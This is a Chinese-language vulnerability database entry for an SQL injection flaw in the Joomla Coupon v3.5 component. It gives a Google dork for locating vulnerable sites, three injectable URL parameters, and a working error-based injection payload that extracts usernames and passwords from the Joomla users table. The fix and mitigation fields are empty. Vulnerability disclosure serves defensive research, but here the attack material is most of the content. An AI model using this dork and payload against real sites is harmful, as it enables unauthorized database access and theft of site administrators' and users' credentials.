Joomla! Component Coupon v3.5 - SQL Injection

基本字段

漏洞编号:
SSV-92820
披露/发现时间:
未知
提交时间:
2017-03-23
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
Joomla
漏洞作者:
未知
提交者:
z3r0yu
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 z3r0yu 共获得  0KB

Joomla! Component Coupon v3.5 - SQL Injection

Joomla! Component Coupon v3.5,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间的盲注

Google Dork:

inurl:index.php?option=com_coupon

注入点:

# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL]

# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL]

# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL]

报错注入 payload:

http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

测试截图:

共 0  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 z3r0yu 共获得   0.2KB
登陆后兑换查看

共 1 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1799
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负